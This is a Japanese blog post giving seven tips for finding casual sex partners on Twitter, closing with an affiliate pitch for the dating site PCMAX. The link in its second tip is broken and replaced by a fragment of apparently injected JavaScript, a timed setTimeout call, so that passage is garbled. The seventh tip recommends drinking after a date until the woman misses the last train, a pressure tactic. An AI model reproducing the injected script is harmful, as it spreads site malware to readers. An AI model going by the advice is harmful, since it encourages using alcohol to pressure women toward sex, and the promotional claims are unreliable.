Twitterでセフレを作る方法とは|難しい理由とポイントを紹介

  • このエントリーをはてなブックマークに追加
  • Pocket

みなさんはセフレが欲しくなった時、どうやって探しますか?

今はリアルな出会いがなくても、SNSで次々と好みの女の子が目に入ってくるため、なんとかその子と近づけないかと思ったことのある人も多いでしょう。

今回はそんなSNSの中でも、日本で人気のTwitterに焦点を当ててセフレGETの方法を解説していきたいと思います。

Twitter界隈ではネットで知り合って、セックスすることを「オフパコ」と呼んでいます。オフラインでパコパコ。略してオフパコです。

気軽にオフパコできるセフレが欲しいですよね。Twitterでセフレを探すのはお金がかからないのがメリットです。

でもTwitterでセフレを作るのは簡単ではありません。なので、この記事をしっかり読んで実践して、かわいいセフレをゲットしてくださいね。

Twitterでセフレを作るのが難しい理由とは

まずはTwitterでセフレを作ることがなぜ難しいのか?という理由を説明していきます。

FacebookやInstagramなど、その他のSNSでも同様にセフレを作るのが難しいのです。ただSNSの中ではTwitterが最もセフレ作りやオフパコには向いています。

ただ難しい…。出会い系サイトやマッチングアプリに比べれば難易度は高いです。もちろん不可能ではないですし、実際に作ることはできます。

まずは「なぜTwitterでセフレを作ることは難しいのか」この理由を把握しましょう。闇雲に「セフレが欲しい」「オフパコしたい」と行動しても時間の無駄です。

効率的にかつ高確率でセフレを作ることを考えましょう。

その他のSNS(Facebook、Instagram)がセフレづくりに向かない理由を紹介した記事もあります。ぜひ合わせて読んでみてください。

Twitterは男女の出会いには向かない

Twitterとはそもそも、日常の思ったことや伝えたいことを140字以内で気軽に発信できるSNSです。特に男女の出会いを考えて作られたSNSではありません。

Twitterでは、趣味のコミュニティであったり、意見が会う人同士のつながりはできやすいです。でもそこから実際に会うのは、初心者の方にはハードルが高いでしょう。

実際に会わないとセフレには絶対にできませんから…。

Twitterはオンライン上で完結しているサービスです。オフラインで会う「オフ会」はサービス側では想定されていない使い方です。

だからTwitterからリアルで会うのは難しいのです。Twitter上でプロフィールの設定はしますが、信憑性は薄いし、情報が少ない。

誰だって「怪しい人とは会いたくない」「何されるかわからないから怖い」と思います。

もちろん、Twitterをかなり使い慣れた人であれば、Twitter上での出会いからオフ会などで、リアルで会っている人もいます。

ですが基本的には、友達や趣味のつながり、憧れの人のツイートを見る、という使い方がほとんどです。男女の出会いには向かないアプリケーションといえるでしょう。

Twitterを使う目的が人によってはっきりしている

日本のTwitterの利用者数は月間4,500万人と言われています。多いですね。日本の人口が約1億2,000万人なので、3人に1人はTwitterを使っていることになります。

でもその中で男との出会いを目的に利用している女の子はごくわずかです。なぜなら上でも伝えましたが、Twitterでの情報は信用できないからです。

Twitterは使う目的が人によってはっきりしているので、セフレを作るのは難しいのです。目的は下です。

Twitterを使っている目的とは
– 友達の近況確認や交流
– 趣味や興味のあることの情報収集
– 憧れの人物について知るため
– 世の中のトレンドの情報収集

女の子は特に「趣味や興味のあることの情報収集」「憧れの人物について知るため」が多いです。「友達の近況確認や交流」はInstagramに役割が移りつつあります。

このようにそれぞれがそもそもの目的を持ってTwitter使っているため、そこでの出会いに対してそもそも興味がない女の子が大半なのです。

友達を楽しく話しているのに、突然ナンパされても不快に思うでしょう。それと同じことです。Twitter上でも趣味の情報収集をしているのに、突然DMを送っても返信なんかこないのです。

Twitterでセフレを作る7つのポイント

7つのポイント
1.裏垢はネカマの可能性が高いので無視する
2.「#セフレ募集」にだまされない
3.人柄がわかるプロフィールを作る
4.趣味のつながりを広げる
5.フォローした子のツイートには反応する
6.仲良くなったらDMでやり取りをする
7.ふたりで会う約束をする

基本的にセフレを作るのは難しいTwitterですが、それでもポイントを抑えて実践を繰り返していれば、セフレを作ることが可能です。

ただ何度も言いますが、簡単ではないので、根気よく上のステップを繰り返し実践していくことが大事。繰り返していくうちに慣れてきます。慣れれば必ず2人で会える確率は上がるので、これから紹介する7つのポイントを最後までしっかり読んで頭に入れてください。

大事なことはただ繰り返すだけじゃダメなこと。繰り返すプロセスで「何が良かったのか?」「何が悪かったのか?」と必ず行動を振り返ることです。

それでは7つのポイントを詳しく説明していきます。

1.裏垢はネカマの可能性が高いので無視する

まず注意しなければいけないのは、「ネカマ」と呼ばれるアカウントです。

「ネカマ」とは「ネット上のオカマ」のことで、若い女の子を装っている男のことです。画像やツイートしている内容を見ると一見「女の子かな?」と思いますが、男が女の子になりすましているというものです。迷惑ですよね。

例えば、「○○@裏垢」のようなアカウント名のものは、ネカマである可能性が高いです。多くのネカマの目的は、男をアカウントに呼び寄せて、最終的に高額な出会い系サイトに誘導し、お金を稼ぐことです。裏垢は無視しましょう。

ネカマと絡んでも女の子と出会える可能性はゼロなのでただ時間の無駄です。だって中の人は男だから。ネカマには絡まない、または絡んできても無視するようにしましょう。

▼怪しい裏垢アカウントの例

怪しいTwitterの裏垢アカウント01

怪しいTwitterの裏垢アカウント02

怪しいTwitterの裏垢アカウント03

2.「#セフレ募集」にだまされない

Twitterには「#」と書いてハッシュタグと呼ばれる機能があります。これはツイートの中に「#◯◯◯」とつけて、タグを付与するものです。

検索しやすくするラベルのようなもので、「#」の後にそのツイートに関連する言葉を並べます。

その中でも「#セフレ」「#セフレ募集」「#セフレの作り方」「#セフレ欲しい」など、明らかに男を誘うようなハッシュタグをつけてツイートしているアカウントにも注意しなければなりません。これもまたネカマである可能性が高いからです。

少し絡めばすぐに聞いたこともないような出会い系サイトのURLを送ってきたりします。最近では、LINE@へ誘導するパターンも増えているようです。このようにハッシュタグも、ネカマを見分けるポイントになります。

セフレを求めている女の子は決して「#セフレ募集」などツイートしません。なぜならセックスできれば誰でもいいわけではないからです。

「#セフレ」と募集すれば、たくさんの男からのDMやらリプライが飛んできます。たくさんの反応は面倒なわけです。

趣味でセックスするんだよ?女の子だってみんないい男に抱かれたいに決まってるじゃん!
※参照
dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton.org/twittersefure/”>セフレ情報局

これがセフレを求めている女の子の本音でしょう。Twitterでは完全にセフレを求めている女の子は売り手市場なので、男を選びたい放題なわけです。

怪しいネカマの「#セフレ募集」投稿の例

裏垢アカウントの疑わしい投稿のキャプチャ01

裏垢アカウントの疑わしい投稿のキャプチャ02

裏垢アカウントの疑わしい投稿のキャプチャ03

裏垢アカウントの疑わしい投稿のキャプチャ04

裏垢アカウントの疑わしい投稿のキャプチャ05

3.人柄がわかるプロフィールを作る

あなた自身のアカウントの作り方もセフレをTwitterで作る上で重要です。上で伝えた通り、Twitterはオンライン上で完結するよう設計されているので、プロフィールに信憑性がありません。

信頼できないと、いくらいいね!としたり、RTをしても「得体の知れないアカウント」だったり、「暗そうなプロフィール」だと、女の子も絡んではくれません。

まずは「あなたの人柄がわかるプロフィール」を作り込みましょう。ただ人柄だけではダメ。清潔感あるプロフィールを目指すのです。

次の項目で詳しく説明しますが、趣味やハマっていることがわかる内容だとなお良いです。初めて見た人に、爽やかさを印象付けるプロフィールを心がけましょう。

ポイントは「アイコン」「背景画像」「プロフィールの文章」のそれぞれを意識して、すべて爽やかさを印象付けるものにすることです。

下の例文を参考にあなたらしいオリジナルなプロフィールを設定してみましょう。※もちろん丸パクリでもOKです

爽やかなプロフィールの例文①
アニメ/旅行/バンド/ギター/趣味やプロフィールなどで気になった人をフォローさせてもらってます/気軽に絡んでください!

爽やかなプロフィールの例文①
普通のサラリーマン。フットサルと酒と銭湯が好き。同じ趣味をもっている人が繋がりましょう!

爽やかなプロフィールの例文③
ファッションと映画と本が好き。アラサー独身の会社員。好きなことの情報を発信したり、受信したり。気軽にフォローして下さい^ ^

4.趣味のつながりを広げる

さて、ここからは具体的な使い方についてです。Twitter上で趣味のつながりを作り、それを活かしてセフレを作るという戦略が最も効率的です。

おすすめは自分の本当の趣味を絡めることです。すでにアカウントを持っていて、趣味のつながりもあるという人には有利ですね。

具体的な方法としては、まず同じ趣味を持っている女の子を探してフォローします。できるだけたくさん、気になる女の子をフォローしてください。

ただし、1日にあまりにたくさんの人をフォローしすぎると、アカウントが停止されることもあるので注意が必要です。1日20人くらいが目安でしょう。

また趣味でなくても、価値観でフィルタリングして、気になる子をフォローするのもいいでしょう。

5.フォローした子のツイートには反応する

女の子たちをフォローしていけば、自分のタイムラインにそのフォローした子のツイートが流れてきます。ここでのポイントは、そのツイートに必ず反応してあげることです。

「いいね」「リツイート」「引用リツイート」「リプライ」どの方法でもいいので、とにかく何かしら反応してあげることが大事です。

ツイートに反応していくことで、まずはこちらのアカウントの存在に気づいてもらえます。何度も繰り返し反応することで、少しづつこちらが気になるようになってきます。

心理学用語で言う、単純接触効果(ザイオンス効果)というものです。何度も見聞きすることで親近感が湧いてくる心理効果です。ですので、ツイートに対する反応は1回だけではなく、必ず複数回反応してください。

毎日挨拶してくる女の子と、話したこともない女の子だったらどっちが気になる存在ですか?

もちろん前者の毎日挨拶してくる女の子でしょう。Twitter上でもそれと同じことが言えるのです。

少し手間ですが、いいね!よりは、リプライを優先しましょう。短文でもまったく問題ありません。「めっちゃわかる!」「激しく共感」「勉強になった」「今後行ってみます!」など。

大切なのは「ツイートを見てます」という意思表示です。接触回数をとにかく増やすことが目的です。

6.仲良くなったらDMでやり取りをする

ツイートに反応し続けてこちらの存在を認識してもらったら、次はDM(ダイレクトメッセージ)へのやりとりへ移りましょう。

DMとは、2人だけが見られて2人の間だけでやりとりするTwitter上のメッセージ機能です。ツイートのように公開されないので、第三者を気にせずにコミュニケーションが取れます。

では、どの段階でDMへ持っていけばいいのかですが、まずお気に入りの女の子のツイートにリプライした時に、リプライで返事が返ってくるかどうかが一つの目安になります。

リプライが返ってくればまずは好感触。リプライでのやりとりが続いて、会話になってくるようならDMを送ってみても良いでしょう。

そしてDMでのやりとりでも趣味の話で盛り上がることができれば、かなりの好感触です。

DMでは「前から気になっていた」「ツイートの内容が好き」などを切り口に趣味の話を広げましょう。

7.ふたりで会う約束をする

DMでのやりとりに持ち込み、そこでも盛り上がることができれば、次は実際に会う約束をする段階です。

ここでの誘う口実は難しくありません。既に共通の趣味の話で盛り上がっているからです。

DMで趣味の話をする中で、その女の子が食いつきそうな口実を探して会う約束をするのがいいでしょう。例えば、共通の好きなバンドでつながったならライブやカラオケに誘う、アニメ好きでつながったならイベントやグッズの買い物に誘うなどですね。

2人で遊ぶ約束をしたら、相手はあなたをかなり信頼していると考えていいですし、既に少し好意がある場合もあります。そこまでいけば体の関係は難しくないですね。あとはデートを盛り上げ、デート後はお酒を飲みながら終電を逃すというのは王道手段です。

ただし、セックスに持ち込むまでは焦るのはNGです。相手の様子も伺わずに焦ってセックスまで持ち込もうとしてしまえば、必ず嫌われてしまいます。今までTwitter上でやり取りした労力が無駄になってしまうので、下心は適宜セーブしましょう。

Twitterでセフレを作ってセックスを楽しもう

いかがだったでしょうか?Twitter上で女の子からある程度信頼を得るには、かなりTwitterを使い慣れていないと難しいです。

もちろんポイントを抑えて繰り返し、地道にコツをつかんでいくのも一つの手です。ですが実際、出会い系サイトやマッチングアプリなどを使う方が効率がいいし手軽でいいです。少しお金をかけたとしても、Twitterでコツコツやっていく労力と時間を考えれば、その方が結果的にコスパはいいし簡単に出会えますね。僕がいつも使っている出会い系サイトはPCMAXです。登録は無料なので、ぜひ試してみてください。

この記事を最後まで読んでくださったみなさんが、かわいいセフレをGETできることを陰ながら応援しています!

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。